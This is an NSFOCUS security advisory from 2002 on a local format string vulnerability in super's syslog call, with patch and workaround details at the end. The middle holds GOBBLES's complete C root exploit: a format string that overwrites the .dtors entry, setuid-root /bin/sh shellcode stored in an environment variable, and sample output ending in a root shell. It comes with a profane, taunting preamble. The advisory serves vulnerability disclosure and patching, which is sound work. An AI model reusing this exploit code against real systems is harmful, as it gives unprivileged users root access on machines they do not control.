NSFOCUS Security Monthly -> Issue 34 -> Latest Vulnerabilities
William Deich Super SysLog Local Format String Vulnerability

Date: 2002-08-16

Published: 2002-07-31
Updated: 2002-08-09

Affected systems:
William Deich super 3.18
William Deich super 3.17
William Deich super 3.16
William Deich super 3.12
Unaffected systems:
William Deich super 3.19
Description:
---------------------------------------------------------------------
BUGTRAQ ID: 5367

Super lets an administrator control users' access to files and functions, much like Sudo.

Because Super passes the error message to syslog() incorrectly, a local attacker can exploit the flaw to mount a format string attack.

Super is installed setuid root by default and uses a configuration file to decide whether a user may run commands with another user's privileges. When a user who is not listed in the configuration file runs Super, Super logs an error message through syslog(3) with the following code:

From error.c
...
#define SysLog(pri, buf) syslog((pri), (buf))
...
SysLog(error_priority, buf);
...

The format string handed to syslog is therefore under the user's control. An attacker can supply a malicious format string that crashes the program, and a carefully constructed one can write to arbitrary memory locations and execute arbitrary instructions with root privileges.
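The defect is that buf itself is the format argument. As an added illustration (not code from the advisory or from super's source), the following places the quoted macro beside its hardened "%s" form, rebuilds the error text the way the sample output shows it, and counts the conversion directives a formatter would act on; SysLog_vulnerable, SysLog_hardened, build_error, count_directives and log_hardened are names chosen here, and the input is constructed.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Pattern from super's error.c as quoted above: buf, which already holds
 * text taken from the user's command line, becomes syslog's format string. */
#define SysLog_vulnerable(pri, buf) syslog((pri), (buf))

/* Hardened form: a constant format; buf is only ever a %s argument, so any
 * '%' it contains is written to the log literally. */
#define SysLog_hardened(pri, buf) syslog((pri), "%s", (buf))

/* Constructed helper: builds the error text in the shape of the sample
 * output above, with the command name taken straight from argv. */
int build_error(char *buf, size_t n, const char *cmd)
{
    return snprintf(buf, n, "No such super command as `%s'.", cmd);
}

/* Counts the conversion directives a printf-style formatter would act on if
 * buf were used as the format ("%%" is a literal percent). A non-zero count
 * on a message built from user input is the exposure the vulnerable macro
 * creates; under the hardened macro the count no longer matters. */
int count_directives(const char *buf)
{
    int n = 0;
    for (const char *p = buf; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') { p++; continue; }   /* escaped percent */
        n++;
    }
    return n;
}

/* The hardened path rendered into a buffer instead of the syslog socket so
 * the result can be inspected; buf goes through "%s" as in SysLog_hardened. */
int log_hardened(char *out, size_t n, const char *buf)
{
    return snprintf(out, n, "%s", buf);
}

int main(void)
{
    char buf[256], out[256];
    build_error(buf, sizeof buf, "xx%x%n");           /* constructed input */
    printf("directives in message: %d\n", count_directives(buf));
    log_hardened(out, sizeof out, buf);
    printf("logged literally: %s\n", out);
    return 0;
}
```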

<*Source: GOBBLES (gobbles@hushmail.com)

  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=102812622416695&w=2
*>

Test method:
----------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!

GOBBLES (gobbles@hushmail.com) provided the following test program:

/*
* SAVE DEFCON..HELP GOBBLES..SAVE DEFCON..HELP GOBBLES
*
* When GOBBLES say he and he security team
* are non-profit. He really mean NON-profit.
* This means GOBBLES and he GOBBLES Security
* Labs (GSL) friends do not have much funds.
*
* GOBBLES was hoping to receive the money
* for speaking at the defcon gathering of
* security enthusiasts up front. So he could buy
* and pay for he ticket to Las Vegas from the great city
* of Baltimore where he currently resides.
*
* GOBBLES is not selling out.  GOBBLES is just admitting that he
* need your help.  Please, help GOBBLES!
*
* After many e-mails to defcon organisers it became
* apparent to GOBBLES this was not going to happen.
* This mean GOBBLES has no way of getting to defcon.
* This also mean GOBBLES cannot deliver he talk that
* are named "Wolves among us". Alot of time and work
* went into the preperation of this talk and it was
* to be the grand finale of the year of the turkey
* (2002). With many new 0-day to give out and many
* great anouncements to be made.
*
* Thanks to Jeff Moss (dt@defcon.org, jmoss@blackhat.com)
* you, the defcon attendee, may very well get cheated out
* of attending one of the most provocative and daring
* events defcon history has ever seen.
*
*     !!! ITS NOT TOO LATE..BUT HURRY !!!
*
* Help GOBBLES go to defcon. GOBBLES give so much to
* the community..is it not time the community now help
* a poverty stricken turkey to spread his wings and fly
* towards fame and glory?
*
* Reasons why you should help GOBBLES get to defcon:
*  
* -- Paying for GOBBLES plane ticket to Vegas is better than spending $300 on a stripper
*
* -- Seeing GOBBLES present naked: Priceless.
*
* -- Zeroday (possible hardcover) GOBBLES comic
*
* -- A chance to buy GOBBLES art
*
* -- A chance to receive _free_ GOBBLES T-shirts
*
* -- Copies of those exploits you couldn't code
*
*
* What does GOBBLES need?
*
* Basically GOBBLES need to round up 300 US dollars before saturday.
* "Wolves among us" is sheduled for the last day of defcon.
* Namely 3PM on Sunday August 4th. As you can very well imagine
* this talk was going to blow the lid off of more dirty secrets
* than there are noodles in China. With your help GOBBLES can still
* make this happen. So what GOBBLES is asking for is a little helping
* hand from the community. If anyone has the funds to sponsor GOBBLES
* to come to defcon please contact GOBBBLES at GOBBLES@hushmail.com.
*
*     !!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!!
*
* GOBBLES accepts Western Union payments.  GOBBLES will not accept anything
* beyond the amount needed for travel to Vegas and back.  GOBBLES is not
* selling out, GOBBLES is asking help from those penetrators and researchers
* that GOBBLES helps every day.
*
* In other news, ISS rejected GOBBLES request for a job application.  It
* seems that they're afraid of getting scalp'd.
*
*                  Political statement:
* HALT THE SNOSOFT ABUSE OF 14 YEAR OLDS. MAKING CHILDREN SLAVE OVER 3 LINE
* PERL EXPLOITS FOR LESS THAN MINIMUM WAGE IS NOT VERY ETHICAL !!!
*
* FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN  
* JAIL W00W00 JAIL W00W00 JAIL W000W0 JAIL W00W00 JAIL W00W00 JAIL W00W00
* FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM
*/

/*
* GOBBLES-own-super.c
*  -- root exploit for root hole in root wrapper
*
* Super is sudo wannabe that boasts much security.
* GOBBLES think people who write setuid wrappers
* should learn to program securely before opening
* big hoohoo about how secure program is.
*
* Current super version (3.18):
*   -- ftp://ftp.ucolick.org/pub/users/will/
*
* Super maintainer say following about he code:
*
* "Super allows an admin to control access to files
*  and functions for users. It is similar to sudo, but
*  uses a different approach in the configuration file."
*
* Problem:
*
* When super is compiled to use syslog(3) for its logging
* of error messages the following lines makes pre-auth
* local root exploitation rather trivial:
*
* From error.c
* ...
* #define SysLog(pri, buf) syslog((pri), (buf))
* ...
* SysLog(error_priority, buf);
* ...
*
* This means users that are not in the super config file
* will be able to execute code with root priviledges.
*
* "Super acts as a SetUID wrapper around system commands
*  to make sure the commands are executed safely, and
*  only by authorized users."
*
*         hehehe ;PPpPPPPp
*
* Love,
* GOBBLES
* GOBBLES@hushmail.com
*
* Official site: http://www.bugtraq.org
* Official mirror: http://www.immunitysec.com/GOBBLES/
*/

/* Proof Of Concept:

$ gcc GOBBLES-own-super.c -o GOBBLES-own-super  
$ ./GOBBLES-own-super

Usage:
./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]

$ objdump -s -j .dtors /usr/local/bin/super

/usr/local/bin/super:     file format elf32-i386

Contents of section .dtors:
8063f7c ffffffff 00000000                    ........        

$ ./GOBBLES-own-super -t 0x8063f7c
. target @ 0x8063f80
. shellcode @ 0xbfffffb0
. username: 9 bytes
super: No such super command as `xx個%.49103x%29$hn%.16305x%30$hn'.
sh-2.05#

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>

#define ALLIGN        2
#define DPA        29    

#define SUPER        "/usr/local/bin/super"

void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);

extern char **environ;
char string[256];

int
main(int argc, char **argv)
{
    unsigned long t, w;
    int dpa, allign, shift = 0;
    char c, *store;    

    if(argc == 1) {
        fprintf(stderr, "\nUsage: \n%s -t <.dtors address> [ -o <offset> -A <allignment> ]\n", argv[0]);
        exit(0);
    }
    
    allign = ALLIGN;
    dpa = DPA;
    
    while((c = getopt(argc, argv, "t:o:A:")) != EOF) {
        switch(c) {
            case 't':
                sscanf(optarg, "%p", &store);
                t = (long)store;
                 t += 4;
                break;
            case 'o':
                dpa = atoi(optarg);
                break;
            case 'A':
                allign = atoi(optarg);
                break;
            default:
                fprintf(stderr, "hehehe ;PPppPPPp\n");
                exit(0);
        }
    }
    
    store = NULL;

    if((store = getenv("GOBBLES")) == NULL) {
        stuff();
        if(execve(argv[0], argv, environ)) {
            fprintf(stderr, ". problem re-executing\n");
            exit(1);
        }
    }
    
    w = (long)store;
    // shift is signed so this works both ways
    shift = (strlen(argv[0]) - strlen(SUPER));
    w += shift;
    
    fprintf(stderr, ". target @ %p\n. shellcode @ %p\n", t, w);
            
    buildstring(t, w, dpa, allign);
    
    if(execl(SUPER, "super", string, NULL)) {
        fprintf(stderr, "error executing\n");
        exit(1);
    }
}

void
buildstring(unsigned long t, unsigned long w, int dpa, int allign)
{
    unsigned int un, deux, x, b[4], namelen;
    char a_buf[4];
    struct passwd *pass;    

    memset(string, '\0', sizeof(string));
    memset(a_buf, '\0', sizeof(a_buf));
    
    if((pass = getpwuid(getuid())) == NULL) {
        fprintf(stderr, ". can't find your username\n");
        exit(1);
    }

    namelen = strlen(pass->pw_name);

    fprintf(stderr, ". username: %d bytes\n", namelen);

    for(x = 0; x < allign && x < sizeof(a_buf); x++)
        a_buf[x] = 'x';

    b[0] = (t & 0x000000ff);
    b[1] = (t & 0x0000ff00) >> 8;
    b[2] = (t & 0x00ff0000) >> 16;
    b[3] = (t & 0xff000000) >> 24;

    un = (w >> 16) & 0xffff;
    deux = w & 0xffff;

    if(un < deux) {
                snprintf(string, sizeof(string)-1,
            "%s"
            "%c%c%c%c%c%c%c%c"  
            "%%.%hdx" "%%%d$hn"
            "%%.%hdx" "%%%d$hn",
                        a_buf,
            b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
                        un - (8 + allign + 29 + namelen),
            dpa, deux - un, dpa + 1
            
        );
        }
        else {
                snprintf(string, sizeof(string)-1,
            "%s"
            "%c%c%c%c%c%c%c%c"
            "%%.%hdx" "%%%d$hn"
            "%%.%hdx" "%%%d$hn",
                        a_buf,
            b[0], b[1], b[2], b[3], b[0] + 2, b[1], b[2], b[3],
                        deux - (8 + allign + 29 + namelen),
            dpa, un-deux, dpa + 1
            
        );
        }
}

void  
stuff(void)
{
        char code[] = // the setuid 0 with the execve of the /bin/sh
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
    "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
    "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
    setenv("GOBBLES", code, 1);
}

Recommendations:
---------------------------------------------------------------------
Temporary workaround:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measure to reduce the threat:

* Temporarily remove the setuid bit from the Super binary.

Vendor patch:

William Deich
-------------
The vendor has released an upgrade to fix this security issue; please download it from the vendor's homepage:

William Deich super 3.12:

Debian Upgrade super_3.12.2-2.1_sparc.deb
http://security.debian.org/pool/updates/main/s/super/super_3.12.2-2.1_sparc.deb
Debian 2.2 sparc.

Debian Upgrade super_3.12.2-2.1_powerpc.deb
http://security.debian.org/pool/updates/main/s/super/super_3.12.2-2.1_powerpc.deb
Debian 2.2 PPC.

Debian Upgrade super_3.12.2-2.1_m68k.deb
http://security.debian.org/pool/updates/main/s/super/super_3.12.2-2.1_m68k.deb
Debian 2.2 m68k.

Debian Upgrade super_3.12.2-2.1_i386.deb
http://security.debian.org/pool/updates/main/s/super/super_3.12.2-2.1_i386.deb
Debian 2.2 i386.

Debian Upgrade super_3.12.2-2.1_arm.deb
http://security.debian.org/pool/updates/main/s/super/super_3.12.2-2.1_arm.deb
Debian 2.2 ARM.

Debian Upgrade super_3.12.2-2.1_alpha.deb
http://security.debian.org/pool/updates/main/s/super/super_3.12.2-2.1_alpha.deb
Debian 2.2 Alpha.

William Deich Upgrade super-3.19.0.tar.gz
ftp://ftp.ucolick.org/pub/users/will/super-3.19.0.tar.gz

William Deich super 3.16:

Debian Upgrade super_3.16.1-1.1_sparc.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_sparc.deb
Debian 3.0.

Debian Upgrade super_3.16.1-1.1_powerpc.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_powerpc.deb
Debian 3.0 PPC.

Debian Upgrade super_3.16.1-1.1_mipsel.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_mipsel.deb
Debian 3.0 MIPS (little endian).

Debian Upgrade super_3.16.1-1.1_mips.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_mips.deb
Debian 3.0 MIPS.

Debian Upgrade super_3.16.1-1.1_m68k.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_m68k.deb
Debian 3.0 m68k.

Debian Upgrade super_3.16.1-1.1_hppa.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_hppa.deb
Debian 3.0 HPPA.

Debian Upgrade super_3.16.1-1.1_ia64.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_ia64.deb
Debian 3.0 IA64.

Debian Upgrade super_3.16.1-1.1_i386.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_i386.deb
Debian 3.0 i386.

Debian Upgrade super_3.16.1-1.1_alpha.deb
http://security.debian.org/pool/updates/main/s/super/super_3.16.1-1.1_alpha.deb
Debian 3.0 Alpha.

William Deich Upgrade super-3.19.0.tar.gz
ftp://ftp.ucolick.org/pub/users/will/super-3.19.0.tar.gz

William Deich super 3.17:

William Deich Upgrade super-3.19.0.tar.gz
ftp://ftp.ucolick.org/pub/users/will/super-3.19.0.tar.gz

William Deich super 3.18:

William Deich Upgrade super-3.19.0.tar.gz
ftp://ftp.ucolick.org/pub/users/will/super-3.19.0.tar.gz